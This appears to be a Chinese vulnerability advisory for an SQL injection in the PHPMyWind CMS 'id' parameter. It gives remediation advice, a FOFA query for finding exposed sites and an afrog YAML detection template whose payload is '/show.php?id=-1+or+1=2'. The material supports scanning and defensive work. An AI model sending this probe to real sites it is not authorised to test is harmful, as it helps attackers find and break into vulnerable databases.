phpmywind-cms-id-sql-inject: PHPMyWind CMS id 参数 SQL 注入漏洞

日期: 2025-09-01 | 影响软件: phpmywind cms | POC: 已公开

漏洞描述

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 造成SQL注入漏洞原因有两个:一个是没有对输入的数据进行过滤(过滤输入),还有一个是没有对发送到数据库的数据进行转义(转义输出)。 修补建议 建议在代码中对数字类型的参数先进行数字类型变换,然后再代入到SQL查询语句中,这样任何注入行为都不能成功。并且考虑过滤一些参数,比如get参数和post参数中对于SQL语言查询的部分。 所以防范的时候需要对用户的输入进行检查。特别式一些特殊字符,比如单引号,双引号,分号,逗号,冒号,连接号等进行转换或者过滤。 fofa-query: "PHPMyWind"

PoC代码[已公开]

id: phpmywind-cms-id-sql-inject

info:
  name: PHPMyWind CMS id 参数 SQL 注入漏洞
  author: daffainfo
  severity: high
  verified: true
  description: |
       所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 造成SQL注入漏洞原因有两个:一个是没有对输入的数据进行过滤(过滤输入),还有一个是没有对发送到数据库的数据进行转义(转义输出)。
       修补建议
       建议在代码中对数字类型的参数先进行数字类型变换,然后再代入到SQL查询语句中,这样任何注入行为都不能成功。并且考虑过滤一些参数,比如get参数和post参数中对于SQL语言查询的部分。
       所以防范的时候需要对用户的输入进行检查。特别式一些特殊字符,比如单引号,双引号,分号,逗号,冒号,连接号等进行转换或者过滤。
       fofa-query: "PHPMyWind"

rules:
  r0:
    request:
      method: GET
      path: /show.php?id=-1+or+1=2
    expression: response.status == 200 && response.body.bcontains(b'PHPMyWind安全警告:MySql Error!') && response.body.bcontains(b'错误文件</strong>:/show.php') && response.headers["content-type"].contains("text/html")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/phpmywind-cms-id-sql-inject.yaml

相关漏洞推荐